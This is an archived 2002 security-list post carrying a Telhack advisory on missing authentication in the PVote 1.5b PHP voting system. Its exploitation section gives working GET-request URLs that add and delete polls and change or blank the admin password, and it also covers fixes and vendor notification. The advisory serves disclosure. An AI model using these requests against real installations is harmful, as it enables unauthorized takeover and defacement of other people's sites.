[[ TH 026 Inc. ]] SA #1 - Multiple vulnerabilities in PVote 1.5

From: Daniel Nyström (exceat_private)
Date: Wed Apr 17 2002 - 18:03:02 PDT

Next message: FreeBSD Security Advisories: "FreeBSD Security Advisory FreeBSD-SA-02:21.tcpip"

Previous message: Grimes, Roger: "RE: Snort exploits"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

            Telhack Security Advisory - #1
_________________________________________

Name: PVote 1.5b
Impact: Minor (Content manipulation, Script admin)
Date: April 18 / 2002
_________________________________________

Daniel Nyström <exceat_private>


_I N F O_
PVote is a PHP voting system. It uses MySQL to hold all information about
the system.
Author has been notified of all three problems described in this advisory.


_P R O B L E M_
A lot of the scripts in the PVote package do not properly check who the
userare and
therefore lets anyone add or delete polls at any time. Also, there exist a
vulnerability that
lets anyone change the Admin password or set it to null.


_I M P A C T_
Minor, as content manipulation aint to bad after all. Just a little bit
embarrasing.


_E X P L O I T I N G_
These 'Add/Del' and 'Admin change pass' vulns. can all be exploited from a
web browser by a
basic GET requests that might look something like these:

ADD
http://isp.net/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4
=bad
Question is the question:) o1-o4 are the options.

DEL
http://isp.net/pvote/del.php?pollorder=1
Pollorder is the poll 'id' number. It can be found by stepping thru poll.php
to find the id as shown below:
http://isp.net/pvote/poll.php?pollorder=1
and then increase pollorder (pollorder=2) and so on until you find what you
want.

CHANGE ADMIN PASS
http://isp.net/pvote/ch_info.php?newpass=owned&confirm=owned
Again we are allowed to change stuff without having to authenticate in
anyway.
If we just wanna fuck with the admin we may just enter this:
http://isp.net/pvote/ch_info.php
As it sets both newpass and confirm to "" it sets the pass to "". This thing
could
have been avoided by just adding a line of code that required you to submit
the old pass to be able to change.


_F I X E S_
Many of the scripts in this package needs some kind of secure
authenticationmethod that stops users
from behaving badly >:) and I think it is up to the author(s?) to fix that.
But until then, I would recommend removing the package.


/Daniel Nyström a.k.a excE @ Telhack 026 Inc.


http://excelsi0r.darktech.org/~exce/
http://www.telhack.com <- page temporarily down.

Next message: FreeBSD Security Advisories: "FreeBSD Security Advisory FreeBSD-SA-02:21.tcpip"
Previous message: Grimes, Roger: "RE: Snort exploits"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Apr 18 2002 - 09:08:46 PDT